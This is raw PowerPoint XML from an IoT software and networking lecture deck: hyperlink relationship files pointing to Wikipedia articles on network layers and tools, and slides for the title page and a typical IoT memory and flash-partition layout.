Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Transmission_Control_Protoco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Data_compression" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Packet_segmentation" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Routing" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/802.15.4" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Application_layer" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Frame_(networking)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Character_encoding" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Transport_layer" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Address_space" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Wi-Fi" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide36.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Network_packet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Data_link_layer" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Symbol_rate#Symbols" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Presentation_layer" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_(computer_science)" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/802.11" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/USB" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/API" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Network_layer" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ethernet" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Physical_layer" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Session_layer" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Network_traffic_control" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Ethernet_physical_layer"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Encryption" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Datagram" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/802.3" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/ZigBee" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Bluetooth"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Traceroute"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www.root-servers.org/"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8.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e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12.bin"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide53.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject17.bin"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.bin"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.emf"/><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10.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject19.bin"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject9.bin"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject16.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject5.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject8.bin"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject13.bin"/><Relationship Id="rId22"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.micron.com/-/media/documents/products/technical-note/.../tn46_08.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github.com/u-boot/u-boo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Ifconfig"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hyperlink" Target="https://en.wikipedia.org/wiki/Nmap"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en.wikipedia.org/wiki/Nslookup" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Wireshark"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hyperlink" Target="https://en.wikipedia.org/wiki/Netstat" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Secure_Shell" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Telnet"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Tcpdump"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www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-spec-v1.2.pdf" TargetMode="External"/><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73.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developers.google.com/protocol-buffers/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/googletest" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qemu.org/"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8172" y="1749799"/>
            <a:ext cx="8835656" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0"/>
              <a:t>Internet of Things: Software and Networking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148234" y="4444641"/>
            <a:ext cx="6587613" cy="2094271"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>John L. Manferdelli</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>johnmanferdelli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@hotmail.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US"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FA32F8ED-EEB4-4D51-9E8E-3B145D9B9811}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4926B8AD-3253-544C-ADB9-DF00AE0E6F13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8473440" y="556768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D404E1-CE90-9442-B53A-F9E3A9D32364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080655" y="5567680"/>
            <a:ext cx="1871025" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>6 April 2020 13:40</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146138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904" y="439645"/>
            <a:ext cx="10707329" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Typical IoT memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803660" y="2120088"/>
            <a:ext cx="1941341" cy="441899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>16MB Flash</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03859878-F778-7D4A-8E34-62ADE45451F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371840" y="1841157"/>
            <a:ext cx="2804983" cy="472028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72CDCFE6-098A-6B4E-BD8D-3093A26E56FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717316" y="3163001"/>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latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Peripherals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E79C9C-FA6F-2A47-8159-61A46B0B0449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836544" y="4055774"/>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latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>PCI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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id="{405A9245-2CE8-034E-BDE0-EE104F6FCD39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760950" y="5817902"/>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latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>DRAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D07268-5945-3644-9FB7-E775762F7C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355740" y="1841157"/>
            <a:ext cx="178775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0xffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7814D3-B398-2140-B060-4ADE74962AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370478" y="2558973"/>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0xff000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F47C1C0-CA5C-0F4E-9962-A9504CBF34F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302382" y="3444807"/>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0xf0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4E3BE6-DCA7-9549-82D3-B21C480A25CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3342156" y="4236313"/>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0x80000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30708F2-6B62-B94B-B664-B6B356B8469D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3255779" y="4973121"/>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0x03ffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2199480C-3528-C94A-B8D8-975263E6AB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302382" y="6266949"/>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0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D37B3085-DB00-C24B-BE76-417A3DFF91FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348456" y="5157787"/>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DBAE65-B264-7B4B-AB4E-0D01056C9F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371840" y="4471941"/>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51DC2A-FD0B-5B43-9517-D026BD9A3968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367072" y="4024261"/>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7D3B5F-BEE1-2448-8646-4CAAD6EF21A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348022" y="3619448"/>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904E40-150B-754D-9D60-46F89F8BDAC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="355457" y="3143198"/>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5CF6E1-D15E-1C42-ABDF-0F8D7150BCFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371840" y="2743639"/>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52C6A7A-B5D8-9146-8E36-EA0F3F23D734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651354" y="2404898"/>
            <a:ext cx="2763257" cy="369780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448EF293-3DA0-1A47-A4DC-15C3921C32C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593245" y="5337817"/>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8EE50F-3DBA-3946-A281-AED09D559281}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5613651" y="4782483"/>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DC9F8D-3838-FB4E-923B-37EC2E71CE81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646586" y="4161427"/>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1696ED-C48D-0649-8F1D-B16F2B6BA64E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5622299" y="3447811"/>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7173EE-DAA0-E44E-B483-2A3BE89FF3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651354" y="2880805"/>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9F2A1D2-4DC0-6249-9BE8-B66BE826B656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717316" y="1308007"/>
            <a:ext cx="1106393" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E808414-FA24-AE4D-BA6C-B3E655C577AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5736202" y="1890418"/>
            <a:ext cx="2763257" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Flash partitions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87A7B0C7-3C12-934D-9F8D-4C79F6B3557C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5887898" y="2499021"/>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Bootloader (p1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E579BAF-BF86-394E-AE7F-CFB7856F5407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5887898" y="2994240"/>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Rootfs1 (p2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F71B74-972E-5C4C-8F44-ACB08AB8CCDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5900069" y="3575362"/>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Rootfs2 (p3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
